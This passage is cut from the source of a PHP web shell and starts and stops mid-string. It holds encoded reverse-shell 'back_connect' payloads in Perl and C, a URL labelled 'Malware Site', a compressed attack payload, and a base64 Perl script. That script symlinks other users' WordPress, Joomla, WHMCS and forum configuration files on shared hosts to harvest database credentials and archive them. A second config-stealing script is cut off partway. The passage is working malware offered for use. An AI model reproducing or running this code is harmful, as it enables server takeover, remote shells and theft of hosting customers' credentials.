535tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
536e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
537LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
538vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
539+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
540$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
541ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
542S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
543ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
544Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
545$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
546BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
547zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
548i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
549RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
550jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
5516f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
552// Malware Site
553$malsite = "http://fightagent.ru";
554 $self=$_SERVER["PHP_SELF"];
555
556//Mallattack
557$mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
558//PerlConfig
559$gantengers="IyEvdXNyL2Jpbi9tYW5udSAtSS91c3IvbG9jYWwvYmFuZG1pbg0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLmR6IHsNCmZvbnQtZmFtaWx5OiBUYWhvbWE7DQpmb250LXNpemU6IDE0cHg7DQpmb250LXdlaWdodDogYm9sZDsNCmNvbG9yOiAjMzMzM2ZmOw0KdGV4dC1hbGlnbjogY2VudGVyOw0KdGV4dC1zaGFkb3c6IGJsYWNrIDBweCAwcHggMnB4Ow0KfQ0KI2NoZWNrb3V0dGV4dGFyZWEgew0KDQp3ZWJraXQtYm9yZGVyLXJhZGl1czogMTVweDsNCg0KfQ0KOmhvdmVyI2NoZWNrb3V0dGV4dGFyZWEge29wYWNpdHk6IDAuNjsgYmFja2dyb3VuZC1jb2xvcjozMzMzMzN9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQooJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC1vcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcC9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC1zaG9wcGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hbWVtYmVyL2NvbmZpZy5pbmMucGhwJywka29sYS4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlnLmluYy5waHAnLCRrb2xhLictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1tZW1iZXJzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLictMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWZvcnVtcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJy01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRrb2xhLictNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLXdwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1dQL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1XUC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy13cC1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLWJldGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJlc3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy13b3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXdzL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ldy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtbmV3LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1ibG9nLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2dzL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmxvZ3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLXdwLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtcHJvdGFsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NpdGUvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1zaXRlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1tYWluLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Rlc3Qvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC10ZXN0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJy02LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvZGIucGhwJywka29sYS4nLTcudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29ubmVjdC5waHAnLCRrb2xhLictOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJy05LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvY29uZmlnLnBocCcsJGtvbGEuJy0xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb28vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtY21zLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NpdGUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ldy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy12Yi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy12YjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy1pbmNsdWRlcy12Yi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htMTUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2VudHJhbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tV0hNQ1MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htYy9XSE0vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHAvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VjdXJlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VjdXJlLXdobS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJy13aG1jczIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnRzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50ZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50c3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLW1hbmFnZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbXkudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobS1teXNob3AudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXplbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC16ZW5jYXJ0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc21mL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYtZm9ydW0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYtZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLXVwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdXAyLnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQpyZWFkKFNURElOLCAkYnVmZmVyLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCn0gZWxzZSB7DQokYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQooJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiRuYW1lID1+IHRyLysvIC87DQokbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KJHZhbHVlID1+IHRyLysvIC87DQokdmFsdWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0iZHoiIGJnY29sb3I9ImJsYWNrIj4NCjxwPjxmb250IGNvbG9yPXdoaXRlPmNvbmZpZ3VyYXRpb24gZmlsZSBraWxsZXI8L3A+DQoNCjxzcGFuPjxmb250IGNvbG9yPSJ3aGl0ZSI+c3VwcGx5IHVzZXJuYW1lcyB0byBzeW1saW5rIGNvbmZpZ3VyYXRpb24gZmlsZXM8L2ZvbnQ+PC9zcGFuPjxiciAvPg0KPGJyIC8+PGZvcm0gbWV0aG9kPSJwb3N0Ij48c3Ryb25nPg0KPHRleHRhcmVhIGlkPSJjaGVja291dHRleHRhcmVhIiBuYW1lPSJwYXNzIiBzdHlsZT0iYm9yZGVyOjJweCBkYXNoZWQgcmVkOyB3aWR0aDogMzAwcHg7IGhlaWdodDogMjAwcHg7IGJhY2tncm91bmQtY29sb3I6YmxhY2s7IGZvbnQtZmFtaWx5OlRhaG9tYTsgZm9udC1zaXplOjlwdDsgY29sb3I6IHJlZCIgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDsNCjxwPg0KPGlucHV0IG5hbWU9IlN1Ym1pdDEiIHR5cGU9InN1Ym1pdCIgdmFsdWU9InNwaW4gaXQgOC0pIiBzdHlsZT0iYm9yZGVyOjFweCBkb3R0ZWQgIzAwRkZGRjsgd2lkdGg6IDk5OyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjogYmxhY2s7IHRleHQtdHJhbnNmb3JtOnVwcGVyY2FzZTsgaGVpZ2h0OjIzOyBiYWNrZ3JvdW5kLWNvbG9yOiNGNEY0RjQ7IiAvPjwvcD4NCjwvZm9ybT48L3N0cm9uZz4NCic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KfQ0KcHJpbnQnPGJvZHkgY2xhc3M9ImR6IiBiZ2NvbG9yPSJibGFjayI+DQo8aDI+ZG9uZSA8L2gyPg0KPHA+Jm5ic3A7PC9wPic7DQppZigkRk9STXt0YXJ9IG5lICIiKXsNCm9wZW4oSU5GTywgInRhci50bXAiKTsNCkBsaW5lcyA9PElORk8+IDsNCmNsb3NlKElORk8pOw0Kc3lzdGVtKEBsaW5lcyk7DQpwcmludCc8cD48YSBocmVmPSInLiRGT1JNe3Rhcn0uJy50YXIiPjxmb250IGNvbG9yPSIjMDBGRjAwIj4NCjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiPjwvc3Bhbj48L2ZvbnQ+PC9hPjwvcD4nOw0KfQ0KfQ0KcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+";
560//confshell
561$configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmln